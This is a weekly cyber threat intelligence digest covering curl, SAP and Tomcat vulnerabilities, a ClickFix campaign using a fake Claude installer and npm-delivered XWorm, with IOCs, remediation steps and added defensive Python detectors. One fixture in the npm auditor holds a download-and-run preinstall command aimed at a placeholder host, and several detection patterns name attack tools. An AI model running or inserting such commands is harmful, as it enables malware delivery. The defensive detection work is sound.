Cyber Threat Intelligence Digest: Week 16

22nd April 2026 - Threat Reports
  • Vulnerabilities
  • Potential Threats
  • General News
  • Threat Actor Weekly Graph
  • Global Trends Powered by Recorded Future
  • Prominent Information Security Events
  • Remediation Actions

Executive Summary - Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

Alleged PoC for CVE-2026-3805, High-Severity UAF Vulnerability Affecting Curl - On 12th April 2026, a GitHub user known as Rat5ak published an alleged proof-of-concept (PoC) exploit for CVE-2026-3805, a high-severity Use-After-Free (UAF) vulnerability affecting curl versions 8.13.0 through to 8.18.0. Curl is a widely used open-source command-line tool and library for transferring data across multiple protocols, including HTTP, HTTPS, FTP, and SMB. The vulnerability was addressed on 11th March 2026 with the release of curl version 8.19.0.

CVE-2026-3805 exists within curl’s SMB connection reuse logic. During SMB URL parsing, a temporary “needle” connection is created for cache lookup, where an internal path pointer is set to reference memory within a share structure. If curl identifies a reusable connection to the same SMB host, it frees the temporary connection and its associated memory, leaving behind a dangling pointer. When a subsequent SMB request is made, this stale pointer is used, resulting in a UAF read condition. This can lead to heap memory disclosure to a malicious SMB server or trigger a denial-of-service condition due to an access violation.

 

SAP Patches CVE-2026-27681 Critical SQL Injection Vulnerability in Business Planning and Consolidation and Business Warehouse - On 14th April 2026, SAP patched 20 vulnerabilities, including CVE-2026-27681, a critical vulnerability with a severity score of 9.9 affecting SAP Business Planning and Consolidation and SAP Business Warehouse. The affected versions include HANABPC 810, BPC4HANA 300, and SAP_BW 750, 752 to 758, and 816. At the time of writing, there are no publicly reported cases of active exploitation.

CVE-2026-27681 is an SQL injection vulnerability that could lead to arbitrary code execution. The issue exists because a low-privileged user is able to upload a file containing SQL statements, which are then executed by a vulnerable ABAP program.

Researcher Discloses CVE-2026-34486 Apache Tomcat Tribes Vulnerability - On 9th April 2026, the Apache Software Foundation patched CVE-2026-34486, a vulnerability affecting Apache Tomcat versions 11.0.20, 10.1.53, and 9.0.116. The issue was resolved in versions 11.0.21, 10.1.54, and 9.0.117. It is also recommended to restrict access to the Tribes receiver port (default TCP/4000) to trusted hosts and to monitor logs for suspicious decryption failures. At the time of writing, there are no publicly reported cases of active exploitation.

CVE-2026-34486 is a security control bypass and deserialisation vulnerability that may allow threat actors to achieve unauthenticated remote code execution due to a regression in the EncryptInterceptor within Tomcat Tribes clustering. A control flow error causes decryption failures to fail open, meaning attacker-supplied data may still be processed even when cryptographic validation fails. Successful exploitation could result in malicious data reaching a Java deserialisation pathway, potentially leading to arbitrary code execution.
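The "fail open" control-flow defect described above, shown as an added Python illustration (this is not Tomcat's EncryptInterceptor code): a receiver that notes a verification failure but keeps processing the body, beside one that stops before the body is parsed. For brevity the check is an HMAC tag rather than authenticated decryption, and the key, message layout and payloads are constructed for the example.

```python
import hashlib
import hmac
import json
from typing import Optional

# Constructed shared cluster key for the illustration; not a real Tribes key.
CLUSTER_KEY = b"constructed-cluster-key"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def seal(payload: dict) -> bytes:
    """Sender side: message = HMAC-SHA256 tag || JSON body."""
    body = json.dumps(payload, sort_keys=True).encode()
    tag = hmac.new(CLUSTER_KEY, body, hashlib.sha256).digest()
    return tag + body


def receive_fail_open(message: bytes) -> Optional[dict]:
    """Vulnerable pattern: the integrity failure is logged, but control flow
    continues and the unverified body still reaches the deserialiser."""
    tag, body = message[:TAG_LEN], message[TAG_LEN:]
    expected = hmac.new(CLUSTER_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        print("warning: message verification failed")  # no return here: fail open
    return json.loads(body)


def receive_fail_closed(message: bytes) -> Optional[dict]:
    """Hardened pattern: any verification failure ends processing before parsing."""
    if len(message) < TAG_LEN:
        return None
    tag, body = message[:TAG_LEN], message[TAG_LEN:]
    expected = hmac.new(CLUSTER_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # drop the message; nothing downstream sees the body
    return json.loads(body)


def tampered_copy(message: bytes, new_payload: dict) -> bytes:
    """Constructed test input: the body is replaced while the original tag is
    kept, so verification of the result must fail."""
    return message[:TAG_LEN] + json.dumps(new_payload, sort_keys=True).encode()


if __name__ == "__main__":
    good = seal({"node": "member-a", "op": "sync"})
    bad = tampered_copy(good, {"node": "member-a", "op": "run"})
    print("fail-open processed  :", receive_fail_open(bad))
    print("fail-closed processed:", receive_fail_closed(bad))
```

The structural point is the placement of the early return: in the hardened receiver the only path to `json.loads` runs through a successful `compare_digest`, so a regression that turns the failure branch into a log line cannot silently reopen the path. A unit test that feeds a tampered message and asserts `None` is the cheapest guard against exactly that kind of regression.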

Potential Threats

Threat Actors Use ClickFix Technique in Claude AI Installer Campaign to Deliver Information Stealer - On 16th April 2026, Rapid7 reported a social engineering campaign targeting individuals across the US and the European Union to deliver a multi-stage infection chain. Threat actors distributed an installer posing as a legitimate Claude AI tool and used ClickFix techniques to trick users into initiating the infection. While the final payload was not disclosed, it is likely to be an information stealer capable of collecting sensitive data from compromised Windows systems.

The attack began with a malicious installer hosted on spoofed domains. Victims were prompted to run a command via the Windows Run utility, launching mshta to retrieve a malicious MSIX bundle containing an HTA script. This executed obfuscated Visual Basic and an encoded PowerShell command, which downloaded a secondary script and bypassed AMSI in memory. The activity then progressed through obfuscated PowerShell execution, ultimately decrypting shellcode and using process injection to run the final payload.

Malicious NPM Package and Fake Game Deliver XWorm - On 15th April 2026, JFrog Security reported a supply chain compromise involving a malicious npm package and a fake video game used to distribute XWorm. XWorm is a .NET-based remote access trojan that enables full remote control, data exfiltration, and execution of arbitrary commands on infected systems.

The campaign uses two primary delivery methods: a malicious npm package and a fake game named Astral Warfare. The npm package abuses preinstall hooks to automatically execute a malicious script during installation and also triggers execution when imported, ensuring multiple execution paths. This script downloads and runs a batch file via the Windows Command Prompt.

In parallel, threat actors use compromised Discord accounts to trick victims into downloading a malicious archive containing a fake game executable. This dropper reconstructs an encoded payload, writes a batch script similar to the npm-delivered variant, and executes it, continuing the infection chain.

Gentlemen RaaS Affiliate Uses SystemBC and Multi-Stage Tooling for Enterprise-Wide Compromise - On 20th April 2026, cybersecurity firm Check Point Research published a technical analysis of a Gentlemen ransomware-as-a-service operation conducted by an affiliate using the SystemBC proxy malware. Gentlemen is a multi-platform ransomware family written primarily in Go, supporting Windows, Linux, NAS, BSD, and ESXi environments, enabling large-scale enterprise attacks. According to the report, the campaign combines the use of SystemBC, Cobalt Strike, and a structured lateral movement framework to achieve full enterprise compromise.

Based on the analysis, the attack chain begins with the threat actor already present on a Domain Controller with Domain Administrator privileges, although the initial access vector has not been disclosed. From this position, the threat actor validates credentials and moves laterally across the environment.

General News

Over 1,300 Microsoft SharePoint servers vulnerable to spoofing attacks - Over 1,300 internet-facing Microsoft SharePoint servers remain unpatched against CVE-2026-32201, a spoofing vulnerability that was previously exploited as a zero-day and continues to be abused in ongoing attacks. The flaw affects SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition.

Microsoft addressed the issue as part of its April 2026 Patch Tuesday, noting that successful exploitation allows unauthenticated threat actors to perform network spoofing due to improper input validation. This may enable attackers to access sensitive information and modify data, although it does not impact availability. The attack requires low complexity and no user interaction, increasing its risk profile.

Although Microsoft confirmed active exploitation, it has not disclosed further details regarding the attack methods or attributed the activity to a specific threat actor. Security monitoring has since identified that a significant number of exposed systems remain unpatched, with only limited remediation observed following the release of security updates. 

Cloud platform Vercel says company breached through third-party AI tool - On 20th April 2026, the widely used cloud platform Vercel disclosed a cyber incident in which threat actors gained unauthorised access to internal systems via a compromised third-party AI tool. The attacker claimed access to internal databases and multiple employee accounts, raising concerns around potential supply chain risks involving widely used libraries. Vercel confirmed that a limited subset of customer credentials had been exposed and advised affected users to rotate their credentials immediately. At the time of writing, the full scope of impact remains under investigation.

The breach was traced to the compromise of a third-party AI tool used by an employee, which enabled the attacker to take over the employee’s Google Workspace account and access certain internal environments and non-sensitive environment variables. While sensitive variables were reportedly protected, exposed tokens and configuration data may still pose a risk if not rotated. Further investigation revealed the initial compromise may be linked to an earlier incident involving stolen OAuth tokens and possible infostealer activity. External incident response support has been engaged, and law enforcement has been notified.

Apple account change alerts abused to send phishing emails - Scammers are abusing Apple's legitimate account change notification system to deliver phishing emails that bypass spam filters and pass SPF, DKIM, and DMARC authentication checks. The attack works by creating an Apple ID and embedding phishing text, such as a fake $899 iPhone purchase via PayPal with a callback phone number, into the first and last name fields of the account. When the attacker then modifies the shipping information, Apple automatically sends a security alert that includes the malicious text directly within the legitimate email, originating from Apple's own mail infrastructure (appleid@id.apple.com). The emails appear to be sent to an iCloud address tied to the attacker's account, but header analysis suggests a mailing list is used to distribute them to multiple real targets.

The goal of the campaign is to scare recipients into calling the included "support" number, where scammers impersonate Apple staff and attempt to trick victims into installing remote access software or handing over financial details, which in past campaigns has led to stolen funds, malware deployment, or data theft. This technique mirrors an earlier scheme that abused iCloud Calendar invites in the same way, highlighting how attackers increasingly exploit trusted platform features rather than spoofing them. BleepingComputer reported the abuse to Apple but received no response, and the technique reportedly still works, so users are advised to treat unexpected purchase alerts or callback requests with skepticism, even when they appear to come from genuine Apple infrastructure.
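A mail-filter heuristic for the abuse described above, added here as an example (not from BleepingComputer or Apple): because the messages pass SPF, DKIM and DMARC, the rule keys on the signals the report does give, namely a callback phone number and a purchase amount in text Apple fills from the account name, plus a To: header that does not name the mailbox owner. The two emails are constructed samples; the sender address is the one named in the report.

```python
import re
from email import message_from_string
from email.message import Message
from typing import List, Tuple

# Sender address named in the report; everything else below is constructed sample data.
APPLE_NOTIFICATION_SENDER = "appleid@id.apple.com"
PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")
MONEY_RE = re.compile(r"[$€£]\s?\d[\d,]*(?:\.\d{2})?")
LURE_WORDS = ("purchase", "paypal", "invoice", "refund", "call", "support")

SAMPLE_ABUSED = """From: Apple <appleid@id.apple.com>
To: someone-else@icloud.example
Subject: Your shipping information was updated

Dear Purchase confirmed $899.00 iPhone via PayPal to cancel call support 1-800-555-0199,

The shipping address for your Apple Account was changed.
"""

SAMPLE_BENIGN = """From: Apple <appleid@id.apple.com>
To: victim@example.com
Subject: Your shipping information was updated

Dear Jane Doe,

The shipping address for your Apple Account was changed.
If you did not make this change, review your account settings.
"""


def _text_body(msg: Message) -> str:
    """Collect the text/plain content of a parsed message."""
    if msg.is_multipart():
        return "\n".join(
            part.get_payload(decode=True).decode("utf-8", "replace")
            for part in msg.walk()
            if part.get_content_type() == "text/plain"
        )
    return msg.get_payload()


def analyse(raw: str, mailbox_owner: str) -> Tuple[bool, List[str]]:
    """Return (suspicious, reasons) for a notification that really comes from Apple's sender."""
    msg = message_from_string(raw)
    if APPLE_NOTIFICATION_SENDER not in msg.get("From", "").lower():
        return False, ["not an Apple account notification; out of scope for this rule"]
    reasons: List[str] = []
    body = _text_body(msg)
    if mailbox_owner.lower() not in msg.get("To", "").lower():
        reasons.append("mailbox owner not named in To: header (relayed, e.g. via a list)")
    if PHONE_RE.search(body):
        reasons.append("callback phone number embedded in notification text")
    if MONEY_RE.search(body) and any(w in body.lower() for w in LURE_WORDS):
        reasons.append("purchase amount plus lure wording in the account-name field")
    # Two independent signals are required so a normal alert with one odd word is not quarantined.
    return len(reasons) >= 2, reasons


if __name__ == "__main__":
    print(analyse(SAMPLE_ABUSED, "victim@example.com"))
    print(analyse(SAMPLE_BENIGN, "victim@example.com"))
```

The rule deliberately does not touch authentication results: the whole point of the technique is that those are genuine, so a filter that trusts DMARC alone will pass every one of these messages.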

Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.

 

Severity scale: Limited, Basic, Moderate, High

Threat Actor            | Severity (previous → current) | Opportunity (previous → current) | Intent (previous → current)
BlueCharlie             | Moderate → Moderate           | 53 → 55                          | 25 → 25
UAT-10362               | NEW → Basic                   | NEW → 30                         | NEW → 25
TiMc Ransomware Group   | NEW → Basic                   | NEW → 25                         | NEW → 5
Krybit Ransomware Group | Basic → Basic                 | 25 → 25                          | 25 → 40
miyako                  | Basic → Basic                 | 30 → 40                          | 35 → 35

Global Trends Powered by Recorded Future

Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.

The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.

- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.

Attackers       | Methods             | Vulnerabilities | Targets
ShinyHunters    | JanelaRAT           | CVE-2026-32201  | Booking.com
Hanzal          | Adwind              | CVE-2026-34621  | Take-Two Interactive
Exitium         | JanaWare Ransomware | CVE-2026-33825  | Rockstar Games
Russian Hackers | ProxyShell          | CVE-2025-0520   | Basic-Fit
UNC1069         | Backdoor            | CVE-2026-26980  | Kraken

 

Prominent Information Security Events

Threat Actors Use ClickFix Technique in Claude AI Installer Campaign to Deliver Information Stealer

Source: Insikt Group | Validated Intelligence Event

IOC: Domain - download[.]get-version[.]com

IOC: Domain - oakenfjrod[.]ru

IOC: Hash - 2b99ade9224add2ce86eb836dcf70040315f6dc95e772ea98f24a30cdf4fdb97

On 16th April 2026, Rapid7 reported that threat actors conducted a social engineering campaign targeting individuals across the US and the European Union to initiate a multi-stage infection chain. The attackers distributed an installer masquerading as a legitimate Claude AI tool and used ClickFix techniques to trick victims into initiating the infection. At the time of writing, the final stage malware payload had not been disclosed, although it is assessed to likely be an information stealer capable of collecting sensitive data from compromised Windows systems.

The attack chain began with a malicious Claude AI installer hosted on spoofed domains. After downloading the tool, victims were prompted to execute a command via the Windows Run utility, which launched mshta to retrieve a malicious MSIX bundle. This file contained an embedded HTA script that executed obfuscated Visual Basic code and launched an encoded PowerShell command. The PowerShell then retrieved a secondary script and bypassed the Antimalware Scan Interface by modifying in-memory structures.

The activity progressed through multiple layers of obfuscated PowerShell executed in memory. In the final stage, the script decrypted shellcode and performed process injection using Windows API calls to execute the final payload, commonly associated with information-stealing malware.
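Detection logic for the process chain described in this event and in the Potential Threats summary above (Run dialog to mshta to an encoded PowerShell command), added here as an example rather than a Rapid7 rule. It runs over constructed process-creation records; the hostnames, paths and the encoded-command placeholder are made up, and the `.invalid` domain is a reserved placeholder, not one of the campaign's IOCs.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record: parent image, child image, command line."""
    parent: str
    image: str
    cmdline: str


# Constructed sample telemetry shaped like the chain described above; not real campaign data.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "mshta.exe", "mshta https://download.example.invalid/claude-setup.msix"),
    ProcEvent("mshta.exe", "powershell.exe", "powershell -nop -w hidden -enc AAAAAAAAAAAA"),
    ProcEvent("explorer.exe", "notepad.exe", "notepad C:\\Users\\jane\\notes.txt"),
    ProcEvent("services.exe", "mshta.exe", "mshta C:\\Program Files\\Vendor\\setup.hta"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
]

URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\b", re.IGNORECASE)
INTERACTIVE_PARENTS = {"explorer.exe"}  # Run dialog and desktop launches appear under the shell


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a reason string if the event matches a stage of the ClickFix chain, else None."""
    image, parent = ev.image.lower(), ev.parent.lower()
    if image == "mshta.exe" and URL_RE.search(ev.cmdline):
        return "mshta retrieving remote content"
    if image == "mshta.exe" and parent in INTERACTIVE_PARENTS:
        return "mshta launched from the interactive shell (Run dialog pattern)"
    if image == "powershell.exe" and parent == "mshta.exe":
        return "powershell spawned by mshta"
    if image == "powershell.exe" and ENCODED_RE.search(ev.cmdline):
        return "powershell with encoded command"
    return None


def detect(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Run classify over a batch and return (image, reason) pairs for the hits."""
    hits = []
    for ev in events:
        reason = classify(ev)
        if reason:
            hits.append((ev.image, reason))
    return hits


if __name__ == "__main__":
    for image, reason in detect(SAMPLE_EVENTS):
        print(f"{image:16} {reason}")
```

The two benign records (a local HTA started by a service, and an administrator's `-File` script under explorer) are there to show what the rule must not fire on; the parent-child relationship, not the binary name alone, is what separates the campaign's chain from routine use of the same tools.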

Malicious NPM Package and Fake Game Deliver XWorm

Source: Insikt Group | Validated Intelligence Event

IOC: URL - hxxps[:]//astralwarfare[.]fr/Astral_Warfare[.]rar

IOC: URL - hxxps[:]//astralwarfare[.]fr/script[.]bat

IOC: IP - 185[.]94[.]29[.]43

On 15th April 2026, JFrog Security reported a supply chain compromise involving a malicious npm package and a fake video game used to distribute XWorm. XWorm is a .NET-based remote access trojan that enables full remote control of infected systems, including command execution, surveillance, and data exfiltration. The campaign demonstrates a dual-delivery approach, targeting both developers through package ecosystems and general users through social engineering.

According to the analysis, the attack chain begins with two primary vectors: a malicious npm package and a fake game named Astral Warfare. The npm package abuses preinstall hooks to automatically execute a malicious script during installation and also ensures execution when imported, providing multiple opportunities for code execution. This script retrieves a batch file from attacker-controlled infrastructure and executes it via the Windows Command Prompt, establishing the next stage of the infection chain.

In parallel, threat actors leverage compromised Discord accounts to socially engineer users into downloading a malicious archive posing as the Astral Warfare game. The included executable acts as a dropper, reconstructing an encoded payload and writing a batch script similar to the npm-delivered variant. It then executes the script using standard Windows execution methods, continuing the infection process. Both delivery paths ultimately converge on the same payload execution mechanism, indicating a coordinated effort to maximise infection success across different user groups.
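A review check for the preinstall-hook abuse described here and in the Potential Threats summary above, added as an example (it is not JFrog's tooling): it walks a `node_modules` tree, reads each `package.json`, and reports install-time lifecycle scripts that fetch or run external content. The package names, commands and the `.invalid` host are constructed; the heuristic token list is an assumption to be tuned for your own dependency set.

```python
import json
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# Lifecycle scripts npm runs automatically during installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Heuristic tokens that warrant review when they appear in an install-time script (assumed list).
RISKY = re.compile(
    r"\bcmd(?:\.exe)?\b|\bpowershell\b|\bmshta\b|\bcurl\b|\bwget\b|\bnode\s+-e\b|https?://|\.bat\b",
    re.IGNORECASE,
)


def audit_package(pkg_json: Path) -> List[Tuple[str, str, str]]:
    """Return (package name, hook, command) for every install-time script that looks risky."""
    data = json.loads(pkg_json.read_text(encoding="utf-8"))
    name = data.get("name", str(pkg_json.parent))
    return [
        (name, hook, cmd)
        for hook, cmd in (data.get("scripts") or {}).items()
        if hook in INSTALL_HOOKS and RISKY.search(cmd)
    ]


def audit_tree(root: Path) -> List[Tuple[str, str, str]]:
    """Walk a node_modules tree (or any directory) and collect findings from each package.json."""
    findings: List[Tuple[str, str, str]] = []
    for pkg_json in sorted(root.rglob("package.json")):
        findings.extend(audit_package(pkg_json))
    return findings


def build_sample_tree() -> Path:
    """Constructed node_modules with one benign package and one whose preinstall
    hook pulls and runs a batch file from a placeholder host (illustrative only)."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    benign = {
        "name": "left-pad-ish", "version": "1.0.0",
        "scripts": {"test": "node test.js", "postinstall": "node-gyp rebuild"},
    }
    suspicious = {
        "name": "game-helper", "version": "0.0.1", "main": "index.js",
        "scripts": {"preinstall": "curl -o s.bat http://example.invalid/script.bat && cmd /c s.bat"},
    }
    for pkg in (benign, suspicious):
        pkg_dir = root / pkg["name"]
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(pkg), encoding="utf-8")
    return root


if __name__ == "__main__":
    for name, hook, cmd in audit_tree(build_sample_tree()):
        print(f"{name}: {hook} -> {cmd}")
```

Two caveats: the scan only covers the install-time path, so the second execution path the report describes (code run when the module is imported) still needs the package's entry point reviewed, and `node-gyp rebuild` in the benign sample shows why a blanket block on postinstall scripts is impractical for native modules. Where you can afford it, `npm ci --ignore-scripts` (or `npm config set ignore-scripts true`) removes the install-time path entirely and lets you run needed build steps explicitly.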

Remediation Actions

Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable: 

  • CVE-2026-3805 (curl) – This vulnerability can be remediated by updating curl to version 8.19.0.

  • CVE-2026-27681 (SAP Business Planning and Consolidation / Business Warehouse) – This vulnerability can be remediated by applying the latest SAP security patches for affected versions (HANABPC 810, BPC4HANA 300, and SAP_BW 750, 752–758, 816).

  • CVE-2026-34486 (Apache Tomcat) – This vulnerability can be remediated by updating Apache Tomcat to versions 11.0.21, 10.1.54, or 9.0.117, and restricting access to the Tribes receiver port (TCP/4000) to trusted hosts.
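An inventory triage script for the three remediation items above, added here as an example (not an Acumen Cyber tool). The affected versions and fixes are taken from this digest; the host inventory is constructed, and the script assumes plain dotted version strings for curl and Tomcat and a `sap:<component>` product label with the release number for SAP.

```python
import re
from typing import List, Tuple

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """Turn '8.14.2' (or '8.14.2-something') into a comparable tuple; assumes dotted numbers."""
    m = re.match(r"\d+(?:\.\d+)*", text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in m.group(0).split("."))


# Affected versions and fixes exactly as stated in this digest.
CURL_AFFECTED = ((8, 13, 0), (8, 18, 0))  # inclusive range
CURL_FIXED = "8.19.0"
TOMCAT_FIXED = {(11, 0, 20): "11.0.21", (10, 1, 53): "10.1.54", (9, 0, 116): "9.0.117"}
SAP_AFFECTED = {"HANABPC": {810}, "BPC4HANA": {300}, "SAP_BW": {750, *range(752, 759), 816}}

# Constructed inventory: (host, product, version).
SAMPLE_INVENTORY = [
    ("web01", "curl", "8.14.2"),
    ("web02", "curl", "8.19.0"),
    ("app01", "tomcat", "10.1.53"),
    ("app02", "tomcat", "10.1.54"),
    ("erp01", "sap:SAP_BW", "755"),
    ("erp02", "sap:SAP_BW", "751"),
    ("erp03", "sap:HANABPC", "810"),
]


def triage(inventory) -> List[Tuple[str, str, str]]:
    """Return (host, CVE, action) for every inventory entry this digest says needs patching."""
    actions = []
    for host, product, version in inventory:
        if product == "curl":
            v = parse_version(version)
            if CURL_AFFECTED[0] <= v <= CURL_AFFECTED[1]:
                actions.append((host, "CVE-2026-3805", f"update curl {version} -> {CURL_FIXED}"))
        elif product == "tomcat":
            v = parse_version(version)
            if v in TOMCAT_FIXED:
                actions.append((host, "CVE-2026-34486",
                                f"update Tomcat {version} -> {TOMCAT_FIXED[v]}; "
                                "restrict TCP/4000 to trusted hosts"))
        elif product.startswith("sap:"):
            component = product.split(":", 1)[1]
            if int(version) in SAP_AFFECTED.get(component, set()):
                actions.append((host, "CVE-2026-27681",
                                f"apply the latest SAP security patch for {component} {version}"))
    return actions


if __name__ == "__main__":
    for host, cve, action in triage(SAMPLE_INVENTORY):
        print(f"{host:6} {cve:15} {action}")
```

The Tomcat entry is a set rather than a range because the digest describes the issue as a regression present in three specific releases; a version-range rule would wrongly flag older, unaffected builds on each branch.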

If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.